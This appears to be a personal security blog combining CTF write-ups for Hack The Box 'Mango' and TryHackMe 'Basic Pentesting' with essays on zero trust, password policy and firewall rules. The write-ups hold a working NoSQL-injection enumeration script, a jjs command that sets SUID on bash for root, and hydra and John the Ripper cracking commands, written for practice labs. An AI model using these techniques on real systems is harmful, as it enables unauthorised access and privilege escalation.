Hack The Box – Mango

Whilst I’m not going to post about all of the machines I try on hack the box, I’ll likely post about ones where I learnt something new, and this was an interesting one for me and took me a while to work through and think about.

I took some effort not to spoil it for myself as this is an older retired machine, but the name gives a hint that it is likely a MangoDB backend which is a noSQL database. I have some experience with basic authentication bypass, via manipulating operators in field values, such as $eq (equals), $ne (not equals).

When I checked the login page and saw the username=admin&password=admin&login=login I suspected I could attempt a simple password not equals inject to bypass the authentication process.

The response indicated that it was being processed by the backend, presumably a noSQL DB, but it redirected me to an error page, so I utilised burp to try a few other auth bypass attempts and to extract some data. It is also worth noting that the website utilises PHP which allows query string inputs into an array with brackets, thus PHP allows me to use [$regex] to search for a value in the DB.

I started by confirming this works by checking for a username starting with ‘a’ which is an obvious place to start but also I noted that admin was used in the website source as an email address.

Anyway luckily we got the expected response which is a 302.

Where a non match, which I got when repeating the test but with searching for a username starting with ‘b’ just respond with a 200.

At this point I suspect we can utilise this method to enumerate the username and potentially the password. I’m not a programmer and thus this was an interesting challenge. I did a bit more research on noSQL injection and it seemed pretty straight forward. Thus I started to write some code that would loop through the printable characters for the username, appending any that respond with a 302 with another go through the loop until we got a full username.

Therefore this is the code I wrote and run giving me the username of ‘admin’.

#!/usr/bin/env python3

import requests
import re
import string

url = 'http://staging-order.mango.htb/'
done = False
username = ""
password = ""

while not done:
    done = True
    for c in string.printable:
        data = {
            "username[$regex]": f"^{re.escape(username+c)}.*$",
            "password[$ne]": "admin",
            "login": "login"
        }
        r = requests.post(url, data=data, verify=False, allow_redirects=False)
        if r.status_code == 302:
            done = False
            username += c
            print(f"{c}")
print(f"Username: {username}")

However I’d need to extend this code so it would keep looking for additional usernames starting with other characters and then switch to checking for passwords against those usernames. I’m confident with enough time I could get this working and I still plan to do so but it would likely take me some time and I wanted to own this machine… Thus after a quick search I found the code that does just this which can be found here: https://book.hacktricks.xyz/pentesting-web/nosql-injection

After running this code (it does take a while) I get the following output showing an ‘admin’ and ‘mango’ user both with enumerated passwords.

As nmap showed that ssh was listening I tried connecting to the target with the admin account but that did not work. Trying with mango gave me access as the user mango.

Note: I always try and have something running in the background looking for other information or potential ways of exploit. To this effect I was running gobuster but it didn’t really come up with much of interest.

Once I am on the target I usually do a few things such as check /etc/passwd to see what users are available and potentially any that may have privileges, I also test ‘sudo -l ‘ to check if the user can run any command with elevated privileges. Whilst I saw the admin account in /etc/passwd nothing else stood out so I next search for files with SUID set, using the command

find / -perm -4000 2>/dev/null

This finds a few interesting files but the one that stands out to me is “/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs” which I know is an old java command line tool to interpret scripts or run an interactive shell.

I also want to upload and run linpeas.sh so I start a basic http server on my local machine via the command python3 -m http.server 80 and then utilise wget on the target to fetch linpeas.sh. Once this is run and after checking through the output it confirms that the ‘jjs’ command is a good candidate.

Prior to continuing I look for the user flag and as it is not in mango’s home directory I change to the other account I found earlier ‘admin’ via the command su – admin and here I find the user flag.

Time to check GTFOBins for a way to leverage ‘jjs’ to escalate my privileges. Using one of the examples I find which I slightly modify to set the SUID of bash so I can then run bash and elevate my access. I run the command jjs and then run:

Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()

Which sets the SUID bit on the bash command which I can then run as the user with /bin/bash -p to gain a escalated bash prompt. From here it is a simple matter to get the root flag in the /root directory.

Final Thoughts

I really enjoyed this machine, especially gaining the user access as it required some noSQL injection, which I’ve only basic experience in, as SQL DB’s are more common in my experience, and also having to write some code to automate the enumeration.

This later was very interesting to me as I have not done a lot of coding since university and am trying to practice more python coding when I get the chance, which is not often. The root access was a little simple but that is typically the case once user level foothold is gained on the target.

The video of my attempt at this machine can be found here: https://youtu.be/q8gVAEWn2vg

Zero Trust Network – Hype Cycle?

As the hype cycle of artificial intelligence and machine learning start to wane a new contender for the marketecture focus has emerged. Well it has been around for many years but is getting a lot more attention recently, were almost all the network and security vendors typically have it, or a reference to it, on their front page… That is of course ‘zero trust’.

I for one welcome the focus on zero trust, even though it is somewhat a misnomer, but more on that later, as it helps direct focus on an area of network security that I think has been a struggle for a long time. It has been part of network security, albeit in more niche areas for many years, mainly when working with wireless deployments where mobility of the user is inherent and thus network location cannot be relied upon to provide a comprehensive security posture. Typically this was part of a mobility strategy where the user’s or system’s identity formed the basis of how security posture and controls where applied.

Fast forward 5-10 years and with the increasing adoption of public cloud which has further eroded or at least stretched and evolved the normal boundaries of a network, a more holistic approach to leveraging identity for network controls and access is gaining momentum.

Therefore when I discuss the meaning of Zero Trust I consider treating every connection the same as a foundation, that is, every connection has no implied trust or untrust, enabling the right access to the right destination at the right time. The benefit of this is that being “off-net” is no longer an inhibitor and security controls can be proactively extended to all applications. It is key to understand that zero trust is not a product, technology, standard, pattern or process but rather a principle that spans all technology domains.

Additionally, contrary to many vendor and industry marketing, the perimeter did not disappear, and trust is no longer required, but rather how trust is leveraged and considered is now another tool in the tool belt, where trust is assigned more based on the identity, posture and requirements of an entity, rather than inherited due to location or connectivity medium. It is still important to understanding the boundaries of the network to enable an enhanced definition of policies for users and resources, and the criteria to log, monitor and inspect activities within these boundaries with further understanding of expected behaviors provided by micro-segmentation and identity. It is important to understand that a zero trust implementation is a marathon not a sprint, allowing focus on the greatest risks and iterate over time. In the network it is also important to not try and attempt to control every connection, especially early on, but rather work towards grouping connectivity based on identity and segmentation enabling the controls to remain at the edge of the segment but leveraging the richer information provided by identity, visibility and logging within the network to make more informed security and control decisions.

Once the identity of an entity which is required to establish a connection is known, a control can authenticate and authorize the connection to the destination based on a policy. For example a firewall could block all traffic to an application by default, however based on its verified knowledge of the identity of the entity trying to establish the connection it could allow that connection to pass, this can be extended to specific destinations and to specific times, all defined in a policy, regardless of the entities location.

An important capability for a Zero Trust approach is not just to enable conditional access, but to also ensure that access is secure, by preventing exploits, vulnerabilities, and other attacks, which requires both a clear understanding of what should or should not be traversing the network but also visibility to measure, learn and adapt, which means that the network controls can no longer focus just on layer 4, whilst this is still important, but also needs better insight into layer 7.

Conceptually the steps an organisation needs to undertake to adopt a zero trust approach is to define the landscape which zero trust will be applied, the ability to identify the users, map that identity to the access they are authorised for, distribute the policy to the controls which will enforce the access and monitor the connection to ensure it maintains compliance with the policy. This is an iterative process and can be represented as follows:

To enable the adoption of a zero trust approach, the network, meaning the traffic traversing the network and the devices enabling the network, need to be able to support identity based controls, the ability to segment or isolate and remove any undesired or compromised component or traffic flow on demand.

Underpinning the ability to define the landscape is a micro-segmentation approach in the network where workloads are segmented based on security, support and operational requirements, with well defined zones for administration activities and shared services, which not only allows simplification of controls but also aids in visibility of compromised or mis-configured components.

Final Thoughts

As I mentioned at the start of this thought dump, zero trust is often misunderstood or misportrayed as no entity, be it user, application or system, should have zero trust, but trust is required, perhaps you need to trust your identity store or the links utilised to connect components, but rather that trust should not be implied without better consideration of what, how and why a connection is required. This is likely a long journey which cannot be completed with the purchase or implementation of a technology, but rather by adopting both a micro-segmentation approach, which allows for policies to be tailored to network zones and the expected behaviors and capabilities within those zones and with identifying the requestor of connections along with who or what is making the request.

Whilst the zero trust question cannot be solved with technology alone, it also requires a new approach and new way of thinking, acknowledging that most connectivity will originate from, or be destined to, an entity outside of the organisations network, be it administrators working from home, or applications deployed to a platform as a Service (PaaS), all with the goal of providing the least amount of access required for a user or function to accomplish a specific task.

To realise this zero trust approach the network controls need to incorporate identity information to make decision about what access to resources is enabled and what the user is authorised to do in a dynamic and automated way, along with uplifting the ways of working to leverage these capabilities.

Therefore the best place to start a zero trust journey is with the way you think about security and the mindset of applying controls, expanding the focus from the deeply ingrained network centric based approached to a more holistic view understanding what is actually required. Also trying to do this without an underpinning of network automation will likely lead to lax or overbearing controls.

TryHackMe – Basic PenTest

A long long time ago in a country far far away I worked briefly in a CyberSecurity organisation that performed pentesting and auditing. My main area of focus was network and network security, thus looking at network reachability, exposure, routing, and auditing (and hardening) network infrastructure, mainly Cisco routers, switches and firewalls.

I’ve focused more on the network side of architecture for the last decade after doing some time as a network security domain architect, so when I came across tryhackme and hack the box I was pretty excited to delve back into it.

I thought I’d start off with something pretty easy and thus what follows is my write up and experience. I’ll likely post a few more writeups as I do more machines as I mostly use this as a place to reflect and capture some of my experience, therefore this is likely not the best or most efficient example of how to pwn these machines, but that is not the point… it is to have some fun and hopefully learn (and dust off) some new skills along the way.

I decided to start off with the ‘room’ called Basic Pentesting which utilises:

  • service enumeration
  • brute forcing
  • hash cracking
  • Linux enumeration

I’ve tried to provide some of the more interesting screen shots but also provided the video if anyone wants to watch me stumble through it.

I typically start of with a NMAP scan:

My typical nmap command variables are:

-sV: Probe open ports to determine service/version info

-sC: equivalent to –script=default

These are typically not to slow and provide a good amount of data to progress with. I normally also use -v so I can see the output in progress for a full command of:

nmap -sC -sV -v -oN <output file> <ip address>

Whilst that is running I’ll check out if the target is running a web service, and look at the html code to see if there is anything obvious or if I can see what languages are being used. The site listed as under maintenance but the source had a comment to check the ‘dev notes section’. I could start busting directories with gobuster or dirbuster but decide to just try some manual directories and after a few tried find the /development directory which has a few notes providing a clue to two users J and K and also that J is using a weak password.

I also note that SMB is running from my nmap scan and as nmap indicated the server was Ubuntu decide to run enum4linux. This is probably a good place to point out that as this is a for purpose ‘hack’ box I’m not worried about being noisy, but in a real world pentest one would typically try and be more stealthy and mask some of the scans and enumeration. Enum4linux shows that SMB has ‘Anonymous’ access enabled so I connect via the command: smbclient //<IP address>/Anonymous and find a text file that provides the users name of ‘Jay’ and ‘Kay’.

I already know that Jay’s using a weak password so it is a good opportunity to try and brute force the password, which I do with hydra, using the command:

hydra -l jan -p <password list> ssh://<IP address>

As you can see I utilised ‘jan’ as the user and ‘rockyou.txt’ as the trusty password list and after a few moments managed to brute force the password. Now having Jan’s password and knowing that SSH is listening from the NMAP scan I connect using Jan’s credentials.

I poke around a bit but decide to upload linpeas which is a great Local Linux Privilege Escalation checklist script. This shows that Kay’s private key is readable from Jan’s access so I grab Kay’s SSH private key ‘id_rsa’.

I first attempt to connect using Kay’s SSH key but it is protected with a passphrase.

It is now time to try and crack Kay’s private key with John the Ripper. I first convert the private key into a format for use with JtR, using ‘ssh2john’ and then get to cracking. I manage to crack Kay’s SSH key with the command:

john <Kay's ssh key> <password list>

Once we have cracked the passphrase we can use Kay’s SSH key and the cracked passphrase to SSH into the target as Kay using these credentials, which enables me to find the final flag for this room.

Final Thoughts

This was a great way to get back into the groove as whilst it was simple it did utilise a few different techniques to achieve the goal of obtaining access to the target. There are a few other methods that I would potentially try if doing this again as whilst this room is easily achieved with tools or scripts there are more manual methods that could achieve the same outcome, but hey why reinvent the wheel…

I really think that regardless of your level or experience these hacking sites are a great way to improve your skills but perhaps more importantly provide some insight into how to consider deploying and managing your own network, specifically hwo they can be protected, be it at home or for the organisation you work for.

As mentioned this room was basic and didn’t require any new or not already established vulnerability, but as a lot of people in the IT industry know, most breaches are via know and published vulnerabilities and exploits, but further to that it also leans into how technology is connected and security really is only as strong as the weakest link.

Addendum: As I have started playing around more with tryhackme and hackthebox, I’ve come across many great experts in the community that provide a much more detailed, correct and entertaining view into cybersecurity and I’d like to shout out to some of my favorites, being John Hammond and IppSec. I recommend you search them up on youtube as they have a lot of great content!

Update 12/07/21: I recently re-did this room so I could record it and provide a link here: https://youtu.be/pFnSCaN4kGA

Passwords are so passe

Passwords are ubiquitous when dealing with user authentication but are perhaps also the weakest link in security authentication. They generally require the user to maintain a complex yet easy to remember string which can be somewhat of a contradiction as the requirement to recall the string, generally leads to it being, based on, or related to, a known word or something personal to the user, and ultimately easy for a human to remember, and hence reduces complexity and randomness. A possible work around to this issue is to not allow user (human) generated passwords, and rather have the password automatically generated by an application using suitable complexity, however this tends to lead to other issues such as users documenting their password or reusing the same password on many systems.

Perhaps the best method to date is to use a password manager. I started doing this myself a couple of years back and while each have their pros and cons, I’ve never looked back

In 2010 an analysis was performed on the 32 million passwords that were publicly published from the December 2009 Rockyou.com breach.

Some of the key findings of the study include:

  • About 30% of users chose passwords whose length is equal or below six characters.
  • Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
  • Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on). The most common password among Rockyou.com account owners is “123456”.

Additionally, further studies show that this insecure trend sadly doesn’t shift as 26% of users reuse the same password for important accounts such as email, banking or shopping and social networking sites.

To provide some context the following tables represent the approximate maximum time required to guess each password using a simple brute force “key-search” attack.

mixed-62

As can be seen using only mixed alpha and numerical characters even for a password with a character length of 8 it is still feasible to retrieve the password in a short time. It also should be noted that there are many ways to improve the speed that these passwords could be cracked.

mixed-96

Even using all 96 mixed alpha, numerical and symbols for a 6 character length password does not provide enough complexity.

The NASA guidelines, recommend that all passwords be at least eight characters, and contain a mix of four different types of characters – upper case letters, lower case letters, numbers, and special characters such as !@#$%^&*,;” If there is only one letter or special character, it should not be either the first or last character in the password.

Additional to password complexity guidelines other factors should be taken into account such as:

  • Not displaying the password as it is being entered or obscuring it as it is typed by using asterisks (*) or bullets (•).
  • Requiring users to re-enter their password after a period of inactivity (screensaver)
  • Using encrypted tunnels / protocols (SSH, IPSec, SSL) to protect transmitted passwords.
  • Limiting the number of allowed failures within a given time period (to prevent repeated password guessing).
  • Introducing a delay between password submission attempts to slow down automated password guessing programs.
  • Requiring passwords are not shared between users / systems.
  • * Requiring periodic password changes.
  • The frequency for periodic password changes is a widely debated topic and whilst the accepted dogma was to force password changes somewhere between 3-6 months, recently some more evidence has come about that suggests that forcing password change is perhaps, not a good idea, in fact less secure.

More details can be found here.

However given the general insecurity of relying on passwords for authentication it is recommended that these be coupled with some other form of security, such as, two-factor authentication, limiting access, and regular password assessments.

My View:

All systems should enforce that mixed alpha, numerals & symbols be used, with a minimum of 8 characters to ensure suitable complexity.

Additionally, user and administrator passwords are periodically audited to ensure they meet the requirements for complexity and are not based on easy guessable or brute forced dictionary words, and the same passwords are not used by the same person on multiple systems with differing security risk levels.

If possible a password manager should be mandated. Whilst this is a cost for the company this is IMHO far outweighed by the increased security and ease of use which can be applied. Most modern password management applications also support auto filling in forms and passwords which can greatly improve the user experience whilst only requiring the user to remember one secure password.

If possible users should be encouraged to use passphrases rather than passwords as these are generally longer and more complex than passwords.

Finally, one of the biggest security concerns with passwords is protecting them, thus ensuring they are salted and encrypted when stored on any system is paramount, so if when they are stolen it is not feasible for the attacker to decrypt them.

Firewall Rule Guidelines

Whilst reviewing my teams implementation plan I came across some ACL’s and Firewall Rules which I assume had been created some time ago and thence continually added too (by another group) as even from a quick glance it was clear that a lot of the rules didn’t where redundant, or blatantly incorrect.

It made me recall a simple document I had written a few years back which described my thoughts on guidelines or principles for firewall rule management thus thought it worth repeating here…

  • Access should be specifically permitted.
  • IP address ranges and ports, defined in rules should be as restrictive as practical to match source and destination hosts and ports.
  • Sequential IP addresses that match CDIR boundaries should be combined into as few rules as possible.
  • Rules should be ordered, descending from most frequently to least frequently hit rules.
  • At a minimum rules should be applied to traffic that ingress the Firewall.
    The use of NAT should be considered a form of routing, not a type of firewall.
  • The last rule in every ACL should be an explicit deny to all traffic with logging enabled.
  • All rules should be routinely checked for adequacy and removed if not required.

In addition to the above guidelines, the following guidelines should be considered and adhered too for firewalls that intersect the public Internet and the organizations network:

  • Organizations should deny inbound traffic that does uses a source or destination IP addresses from the RFC1918 range (Private IP addresses).
  • Organizations should deny outbound traffic that does not uses the source IP addresses in use by the organization.
  • Organizations should deny inbound traffic that does uses the source IP addresses in use by the organization.

The following depicts how a firewall rule life-cycle may be managed:

fw-rule-flow

My Recommendations:

Firewalls (yes even the ones which call themselves next gen firewalls) provide very course protection and thus should not be viewed as a complete security solution, especially those which are deployed at the boundary to the Internet.

Ideally they are coupled with other security controls to provide a more complete protection layer.

It is perhaps preferable to separate the more in-depth protocol analysis into another device to ensure that the firewall is not impacted by this function and to simplify its management as not all traffic that traverses it will require such in-depth analysis.

It is also recommended that the firewall rules are validated and tested periodically, preferably every quarter to ensure integrity, protection and adherence to the known state of configuration.

Finally it is recommended that the guidelines and firewall rule life-cycle described in this document above are implemented into change management and service life-cycle processes and policies.